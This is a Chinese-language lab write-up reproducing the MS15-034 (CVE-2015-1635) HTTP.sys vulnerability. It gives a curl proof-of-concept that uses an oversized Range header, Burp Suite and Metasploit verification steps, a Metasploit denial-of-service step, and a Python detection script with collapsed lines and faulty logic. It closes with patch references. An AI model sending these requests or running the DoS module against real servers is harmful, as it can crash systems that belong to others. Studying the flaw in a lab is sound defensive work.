CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
一、漏洞描述
HTTP協議棧(HTTP.sys)存在遠程代碼執行漏洞,是由于HTTP.sys不正確的解析HTTP請求引起的,成功利用此漏洞的攻擊者可以執行系統賬戶上任意代碼。
攻擊者必須發送一個HTTP請求到受影響的系統去觸發這個漏洞,通過修改Windows HTTP棧處理請求更新漏洞地址。
主要存在Windows+IIS的環境下,任何安裝了微軟IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系統都受到這個漏洞的影響。
二、本次復現漏洞環境
靶機:Windows Server 2008
攻擊機:Kali
三、漏洞驗證
方法一:curl語法驗證
(1)查看能否訪問目標URL
(2)使用curl poc驗證
curl http://192.168.208.142/iisstart.htm -H "Host: 192.168.208.142" -H "Range: bytes=0-18446744073709551615"(3)查看結果
如果出現416和Requested Range Not Satisfiable,則證明存在漏洞,反之,則不存在
方法二:Burpsuite驗證
在請求包中添加一行:Range: bytes=0-18446744073709551615
判斷方法同上
方法三:使用MSF驗證
(1)kali打開msf:msfconsole
(2)在msf中搜索利用模塊:search MS15-034或search CVE-2015-1635
(3)選擇payload模塊,帶有sanner的是驗證模塊,帶有dos的是攻擊模塊:use 1
(4)設置目標IP:set rhosts xxx.xxx.xxx.xxx
注:端口號如果非80,還要修改端口號
出現如下所示表示不存在:
方法四:python poc腳本
(1)腳本代碼
import requests import systry:print("正在測試http請求,請稍等...")url = "http://" + sys.argv[1]req = requests.get(url,timeout=5)target_server = req.headers['Server']if target_server.find("IIS"):payload = {"Range": "bytes=0-18446744073709551615"}req2 = requests.get(url, headers=payload)#print(req2.text)#print(req1.request.headers) # 輸出自定義的頭部信息if str(req2.content).find("Requested Range Not Satisfiable"):print("-------------------存在MS15-034漏洞-------------------")print("漏洞URL:"+url)else:print("Waring:不存在MS15-034漏洞")print("如有疑問,請手工測試...")else:print("-------------------服務器不是IIS-------------------") except:try:print("http請求失敗,正在測試http請求,請稍等...")url2 = "https://" + sys.argv[1]req = requests.get(url2, timeout=5)target_server = req.headers['Server']if target_server.find("IIS"):payload = {"Range": "bytes=0-18446744073709551615"}req2 = requests.get(url2, headers=payload)# print(req2.text)# print(req1.request.headers) # 輸出自定義的頭部信息if str(req2.content).find("Requested Range Not Satisfiable"):print("-------------------存在MS15-034漏洞-------------------")print("漏洞URL:" + url2)else:print("Waring:不存在MS15-034漏洞")print("如有疑問,請手工測試...")else:print("-------------------服務器不是IIS-------------------")print("-------------------目標無法連接-------------------")except:print("-------------------服務器不是IIS-------------------")(2)測試
四、漏洞攻擊
選擇之前搜索到的dos模塊:use 0
五、漏洞修復
Microsoft已經為此發布了一個安全公告(MS15-034)以及相應補丁:
MS15-034:Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
鏈接:http://technet.microsoft.com/security/bulletin/MS15-034
總結
以上是生活随笔為你收集整理的CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 部落冲突奥迪流什么意思 《部落冲突》官方
- 下一篇: 关于Vmware下NAT模式物理机无法p